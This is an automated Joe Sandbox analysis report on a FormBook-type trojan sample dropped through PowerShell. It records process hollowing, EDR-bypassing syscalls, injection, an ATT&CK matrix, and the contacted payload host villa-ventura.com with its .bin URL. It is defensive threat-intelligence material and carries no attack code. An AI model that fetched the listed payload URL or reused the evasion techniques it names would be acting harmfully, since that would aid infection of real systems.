        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209AB214 mov eax, dword ptr fs:[00000030h]4_2_209AB214
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091A200 mov eax, dword ptr fs:[00000030h]4_2_2091A200
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20940230 mov ecx, dword ptr fs:[00000030h]4_2_20940230
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtTerminateThread: Direct from: 0x7FF9B4322651Jump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
        Sample uses process hollowing technique
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe base address: 400000Jump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe base: 1660000Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe base: 19FFF4Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe "C:\Users\user\AppData\Local\Temp\Sammentrykket.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeCode function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040350A

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		1
        Masquerading        		OS Credential Dumping41
        Security Software Discovery        		Remote Services1
        Archive Collected Data        		11
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Shared Modules        		Boot or Logon Initialization Scripts311
        Process Injection        		12
        Virtualization/Sandbox Evasion        		LSASS Memory12
        Virtualization/Sandbox Evasion        		Remote Desktop ProtocolData from Removable Media1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        PowerShell        		Logon Script (Windows)1
        Abuse Elevation Control Mechanism        		1
        Access Token Manipulation        		Security Account Manager1
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        DLL Side-Loading        		311
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture13
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Abuse Elevation Control Mechanism        		LSA Secrets2
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Obfuscated Files or Information        		Cached Domain Credentials113
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Software Packing        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483268 Sample: PO Tournefortian24535255252... Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 36 villa-ventura.com 2->36 46 Malicious sample detected (through community Yara rule) 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 Yara detected FormBook 2->50 52 2 other signatures 2->52 9 PO Tournefortian2453525525235235623425523235.exe 29 2->9         started        signatures3 process4 file5 28 C:\Users\user\AppData\...\Heptandrous.Arr, ASCII 9->28 dropped 56 Suspicious powershell command line found 9->56 13 powershell.exe 20 9->13         started        signatures6 process7 file8 30 C:\Users\user\AppData\...\Sammentrykket.exe, PE32 13->30 dropped 32 C:\...\Sammentrykket.exe:Zone.Identifier, ASCII 13->32 dropped 58 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 13->58 60 Writes to foreign memory regions 13->60 62 Tries to detect Any.run 13->62 64 3 other signatures 13->64 17 Sammentrykket.exe 6 13->17         started        21 conhost.exe 13->21         started        signatures9 process10 dnsIp11 34 villa-ventura.com 185.90.59.130, 443, 49778 ONILisbonPortugalPT Portugal 17->34 38 Multi AV Scanner detection for dropped file 17->38 40 Tries to detect Any.run 17->40 42 Maps a DLL or memory area into another process 17->42 44 Switches to a custom stack to bypass stack traces 17->44 23 RAVCpl64.exe 17->23 injected 26 WerFault.exe 21 16 17->26         started        signatures12 process13 signatures14 54 Found direct / indirect Syscall (likely to bypass EDR) 23->54

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        PO Tournefortian2453525525235235623425523235.exe29%ReversingLabsWin32.Trojan.Generic

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\Sammentrykket.exe29%ReversingLabsWin32.Trojan.Generic

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://villa-ventura.com/FPkXcnPDrjTal168.bin0%Avira URL Cloudsafe
        http://nuget.org/NuGet.exe0%Avira URL Cloudsafe
        http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
        https://villa-ventura.com/0%Avira URL Cloudsafe
        https://github.com/Pester/Pester40%Avira URL Cloudsafe
        http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
        https://contoso.com/0%Avira URL Cloudsafe
        https://nuget.org/nuget.exe0%Avira URL Cloudsafe
        https://aka.ms/pscore6lB0%Avira URL Cloudsafe
        http://pesterbdd.com/images/Pester.png40%Avira URL Cloudsafe
        https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
        http://www.quovadis.bm00%Avira URL Cloudsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%Avira URL Cloudsafe
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        https://contoso.com/License0%Avira URL Cloudsafe
        https://contoso.com/Icon0%Avira URL Cloudsafe
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        https://github.com/Pester/Pester0%Avira URL Cloudsafe
        https://villa-ventura.com/FPkXcnPDrjTal168.binwt?0%Avira URL Cloudsafe
        http://www.apache.org/licenses/LICENSE-2.0.html40%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        villa-ventura.com
        		185.90.59.130
        		truefalse
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://villa-ventura.com/FPkXcnPDrjTal168.binfalse
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://pesterbdd.com/images/Pester.png4powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://github.com/Pester/Pester4powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://villa-ventura.com/Sammentrykket.exe, 00000004.00000003.77136726603.0000000004890000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77592580545.0000000004891000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.76782450843.00000000050C1000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://contoso.com/powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://contoso.com/Licensepowershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://contoso.com/Iconpowershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.quovadis.bm0powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77039711491.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77136216434.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77135468668.00000000048E2000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://nsis.sf.net/NSIS_ErrorErrorPO Tournefortian2453525525235235623425523235.exe, 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO Tournefortian2453525525235235623425523235.exe, 00000000.00000000.76378317578.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDSammentrykket.exe, 00000004.00000001.76671061814.0000000000626000.00000020.00000001.01000000.00000008.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://ocsp.quovadisoffshore.com0powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77039711491.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77136216434.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77135468668.00000000048E2000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.76782450843.00000000050C1000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.gopher.ftp://ftp.Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.apache.org/licenses/LICENSE-2.0.html4powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://villa-ventura.com/FPkXcnPDrjTal168.binwt?Sammentrykket.exe, 00000004.00000002.77592493794.0000000004868000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          185.90.59.130
          		villa-ventura.comPortugal
          		9186ONILisbonPortugalPTfalse

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1483268
          Start date and time:2024-07-26 23:53:11 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 16m 29s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
          Run name:Suspected Instruction Hammering
          Number of analysed new started processes analysed:9
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:1
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:PO Tournefortian2453525525235235623425523235.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@7/17@1/1
          EGA Information:
          • Successful, ratio: 66.7%
          HCA Information:
          • Successful, ratio: 68%
          • Number of executed functions: 82
          • Number of non-executed functions: 88
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

          Warnings

          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 20.189.173.21
          • Excluded domains from analysis (whitelisted): login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com
          • Execution Graph export aborted for target powershell.exe, PID 6252 because it is empty
          • Not all processes where analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: PO Tournefortian2453525525235235623425523235.exe

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          185.90.59.130IMG88957937579577593957937593756295Jimpy.exeGet hashmaliciousGuLoaderBrowse
            Statement 06_24.vbeGet hashmaliciousGuLoaderBrowse

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              villa-ventura.comIMG88957937579577593957937593756295Jimpy.exeGet hashmaliciousGuLoaderBrowse
              • 185.90.59.130
              Statement 06_24.vbeGet hashmaliciousGuLoaderBrowse
              • 185.90.59.130

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              ONILisbonPortugalPTIMG88957937579577593957937593756295Jimpy.exeGet hashmaliciousGuLoaderBrowse
              • 185.90.59.130
              92.249.48.47-skid.x86_64-2024-07-20T09_04_18.elfGet hashmaliciousMirai, MoobotBrowse
              • 213.58.16.116
              https://ipfs.io/ipfs/bafkreib3ke46wqvmxf2l6dmbd4zt33hp3xlqnasggl7xjjk44d2jusjsvq#emacom-me@eem.ptGet hashmaliciousHTMLPhisherBrowse
              • 213.58.174.94
              AAMwAy8pB7.elfGet hashmaliciousMirai, MoobotBrowse
              • 213.58.144.23
              Statement 06_24.vbeGet hashmaliciousGuLoaderBrowse
              • 185.90.59.130
              5klOcqqL2D.elfGet hashmaliciousMiraiBrowse
              • 213.58.16.125
              T57QiayIem.elfGet hashmaliciousUnknownBrowse
              • 213.58.5.233
              1rA2CJx2rg.elfGet hashmaliciousMirai, MoobotBrowse
              • 213.58.5.209
              0t102oBJAv.elfGet hashmaliciousMiraiBrowse
              • 213.58.107.92
              2U7qDYujmP.elfGet hashmaliciousMirai, GafgytBrowse
              • 185.90.59.90

              JA3 Fingerprints

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              37f463bf4616ecd445d4a1937da06e19setup.exeGet hashmaliciousAmadeyBrowse
              • 185.90.59.130
              setup.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
              • 185.90.59.130
              file.exeGet hashmaliciousVidarBrowse
              • 185.90.59.130
              1lKbb2hF7fYToopfpmEvlyRN.exeGet hashmaliciousLummaC, VidarBrowse
              • 185.90.59.130
              file.exeGet hashmaliciousVidarBrowse
              • 185.90.59.130
              Monetary_Funding_Sheet_2024.jsGet hashmaliciousWSHRATBrowse
              • 185.90.59.130
              IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
              • 185.90.59.130
              88z6JBPo00.exeGet hashmaliciousUnknownBrowse
              • 185.90.59.130
              fJDG7S5OD7.exeGet hashmaliciousUnknownBrowse
              • 185.90.59.130
              Ku8UpPuzaa.exeGet hashmaliciousUnknownBrowse
              • 185.90.59.130

              Dropped Files

              No context

              Created / dropped Files

              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Sammentrykket.ex_cdfd49ac3b26af801454be8ec917eccd673abd_e2f5391c_b8644a7e-ca96-4b2b-b9fa-9dcfc50dcc2a\Report.wer

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):1.0472165698493376
              Encrypted:false
              SSDEEP:96:N4FhcA2HsSn7om7Jf4vXIxcQhc6ncEOcw3z+HbHgSPB6HeaykJzH0srooSOyPrxN:GzcA2Hsm/j0MjW43uouDu76ifAIO8g
              MD5:0574D4BF3B19C82ED766B356EBA8968D
              SHA1:31BB5240ABBBF57C0529396007005F45056E4824
              SHA-256:E37281A276D1679B58DBDA9579C816D52A3F9DE8EA6A87C72849491A15B664E2
              SHA-512:88A42D7C1CA84BDD2EC596FD940834D7563E37A2F368E15F218E52C9B4703841A2D33BAFC455874A8654B5526C80421C7FA43A8FD8EEB70D510AB13459AB5ACA
              Malicious:false
              Reputation:low
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.5.0.4.6.0.0.3.8.6.8.9.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.5.0.4.6.0.0.7.4.6.1.9.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.6.4.4.a.7.e.-.c.a.9.6.-.4.b.2.b.-.b.9.f.a.-.9.d.c.f.c.5.0.d.c.c.2.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.1.a.8.6.b.f.1.-.7.b.e.a.-.4.e.1.c.-.9.c.1.4.-.8.5.9.a.9.0.5.e.c.e.2.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.a.m.m.e.n.t.r.y.k.k.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.d.4.-.0.0.0.1.-.0.0.4.1.-.c.f.b.1.-.7.7.8.f.a.6.d.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.8.4.3.3.b.c.5.f.8.6.b.3.4.e.2.e.a.1.b.5.8.4.b.f.1.a.0.f.3.6.e.0.0.0.0.0.9.0.4.!.0.0.0.0.8.c.d.f.a.6.0.c.6.b.3.f.2.5.c.7.d.4.8.7.5.3.e.5.0.c.2.9.8.b.7.4.6.c.3.3.8.6.d.e.!.S.a.m.m.e.n.t.r.y.k.k.e.t...e.x.e.....T.a.r.

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F81.tmp.dmp

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Fri Jul 26 21:56:40 2024, 0x1205a4 type
              Category:dropped
              Size (bytes):115688
              Entropy (8bit):1.9759978965419622
              Encrypted:false
              SSDEEP:384:7CuT14D0gGzslkHUvhRU65CeFKTPi7QO5iw4IvSxnaQL:u84D0jAqUvj5pAwYwP61fL
              MD5:5CBCCCFAC424ED8C06D6340FB6EB0B40
              SHA1:5C7916D45742828D7B7AA087992B2F33935E2C3C
              SHA-256:43BCF5FF9FA0EE8DE370A685692D2A442BBE927451DD8304EC8ADA9BF8B9E161
              SHA-512:228C03B1D553FAB92C55C7F0572D19F2FEB772A0FA9467F25B47A6DC024BC21F9375BB6C0B498C72DAB086186E228FAA54918E4A07374FEAF1976037DC5CAB7B
              Malicious:false
              Reputation:low
              Preview:MDMP..a..... ..........f.........................................N..........T.......8...........T............I...z...........#...........%..............................................................................bJ......8&......GenuineIntel...........T...........^..f/............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER302E.tmp.WERInternalMetadata.xml

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):6362
              Entropy (8bit):3.725171431225654
              Encrypted:false
              SSDEEP:96:R7IU6o7lZt3i6c6hFYYCqOvzcuujulAtpaMQUG89bZZsfAvTm:R9l7lZNi6c6hFYZru7pDG89bZZsfYTm
              MD5:C8050F0AAA30699748802287100ED561
              SHA1:64CA7593592F5B8185601431113DA97D8338637F
              SHA-256:51FA7247360A7D7B215B9E42B2D368E69FE518D1B9D65173BBC0C25B0E22A93C
              SHA-512:002837E22873677C3931068A440AF5E816933273DDD456FFA6A78659CFD0A074A115918DA2AA431E43FC2ADB5622A55EB2991D22C367C082AFB44041699A9940
              Malicious:false
              Reputation:low
